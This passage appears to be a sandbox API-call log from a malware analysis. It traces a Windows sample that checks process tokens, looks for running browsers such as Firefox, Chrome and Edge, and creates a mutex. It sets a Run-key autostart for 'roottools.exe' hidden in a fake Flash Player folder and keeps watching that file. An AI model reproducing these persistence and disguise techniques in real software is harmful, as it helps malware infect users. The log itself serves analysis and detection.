[4]=0x68))) returned 0x1c [0249.282] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.282] GetLastError () returned 0x7a [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.282] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.282] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.282] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0249.282] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0249.282] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.282] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.282] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.282] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0249.282] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.282] GetLastError () returned 0x7a [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.282] CloseHandle (hObject=0x340) returned 1 [0249.282] CloseHandle (hObject=0x548) returned 1 [0249.282] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.282] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.282] GetLastError () returned 0x7a [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.282] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.282] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.282] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0249.283] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0249.283] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0249.283] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0249.283] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0249.283] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0249.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0249.283] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.283] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.283] GetLastError () returned 0x7a [0249.283] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.283] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.283] CloseHandle (hObject=0x340) returned 1 [0249.283] CloseHandle (hObject=0x548) returned 1 [0249.283] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.283] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.283] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.283] GetLastError () returned 0x7a [0249.283] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.283] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.283] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.283] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0249.283] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0249.283] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0249.283] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0249.283] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0249.283] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0249.283] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0249.284] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) Thread: id = 164 os_tid = 0x84 [0214.986] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0214.986] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="B3") returned 2 [0214.986] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="F6") returned 2 [0214.986] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="E5") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="3F") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="12") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="0A") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="5B") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="E5") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="82") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="5B") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="9C") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="06") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="15") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="9B") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="B3") returned 2 [0214.987] wvnsprintfW (in: pszDest=0x45ebc0, cchDest=3, pszFmt="%02X", arglist=0x45eb9c | out: pszDest="F4") returned 2 [0214.987] CreateMutexW (lpMutexAttributes=0xc77e4, bInitialOwner=0, lpName="B3F6E53F120A5BE5825B9C06159BB3F4") returned 0xb8 [0214.987] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0214.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x45e9d6, cbMultiByte=76, lpWideCharStr=0x45e82c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exeEEEEĥE誵\x0bE\x04") returned 76 [0214.987] PathCombineW (in: pszDest=0x45ec74, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0214.987] PathQuoteSpacesW (in: lpsz="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: lpsz="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 1 [0214.987] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xfc [0214.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4fcf8, cbMultiByte=45, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0214.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4fcf8, cbMultiByte=45, lpWideCharStr=0xf4fd38, cchWideChar=46 | out: lpWideCharStr="Software\\Microsoft\\Windows\\Currentversion\\Run") returned 45 [0214.987] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\Currentversion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x12, lpSecurityAttributes=0x0, phkResult=0x45ef1c, lpdwDisposition=0x0 | out: phkResult=0x45ef1c*=0x104, lpdwDisposition=0x0) returned 0x0 [0214.987] RegSetValueExW (in: hKey=0x104, lpValueName="roottools.exe", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", cbData=0xe2 | out: lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 0x0 [0214.993] RegFlushKey (hKey=0x104) returned 0x0 [0215.744] RegNotifyChangeKeyValue (hKey=0x104, bWatchSubtree=0, dwNotifyFilter=0x4, hEvent=0xfc, fAsynchronous=1) returned 0x0 [0215.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x45ebf6, cbMultiByte=76, lpWideCharStr=0x45ea4c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0215.744] PathCombineW (in: pszDest=0x45f198, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0215.744] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0215.744] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x45ee6c | out: lpFileSize=0x45ee6c*=196608) returned 1 [0215.744] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x290000 [0215.744] ReadFile (in: hFile=0x1dc, lpBuffer=0x290000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x45ee7c, lpOverlapped=0x0 | out: lpBuffer=0x290000*, lpNumberOfBytesRead=0x45ee7c*=0x30000, lpOverlapped=0x0) returned 1 [0215.746] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.747] CloseHandle (hObject=0x1dc) returned 1 [0215.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x45f54e, cbMultiByte=76, lpWideCharStr=0x45f9d8, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0215.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x45f54e, cbMultiByte=62, lpWideCharStr=0x45f3a0, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 62 [0215.747] PathCombineW (in: pszDest=0x45f7d0, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0215.747] FindFirstChangeNotificationW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming", bWatchSubtree=1, dwNotifyFilter=0x13) returned 0x1dc [0215.747] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0225.863] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0225.863] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0225.864] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0225.864] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0225.864] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0225.864] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0225.864] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0225.864] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0226.563] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0226.563] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0226.563] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0226.563] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0226.563] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0226.563] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0226.564] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0226.564] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0235.803] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0235.805] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0235.805] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0235.805] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0235.805] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0235.805] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0235.805] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0235.805] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0235.845] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0235.845] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0235.845] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0235.845] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0235.845] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0235.845] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0235.845] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0235.845] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.188] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.188] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.188] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.188] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.188] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.188] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.188] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.188] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.196] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.196] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.196] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.196] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.196] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.196] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.196] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.196] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.730] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.730] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.730] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.730] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.730] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.730] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.730] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.730] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.737] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.737] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.737] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.737] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.737] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.737] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.738] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.738] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0236.746] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0236.746] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0236.747] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0236.747] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0237.000] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0237.000] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0237.000] FindNextChangeNotification (hChangeHandle=0x1dc) returned 1 [0237.000] WaitForMultipleObjects (nCount=0x3, lpHandles=0x45ee90*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 165 os_tid = 0xa60 [0214.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286f432, cbMultiByte=6, lpWideCharStr=0xc9730, cchWideChar=10 | out: lpWideCharStr="Acuhcina") returned 6 [0214.994] PathCombineW (in: pszDest=0xc8f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0214.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286f43c, cbMultiByte=8, lpWideCharStr=0xc9730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0214.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286f30a, cbMultiByte=85, lpWideCharStr=0x286f034, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash 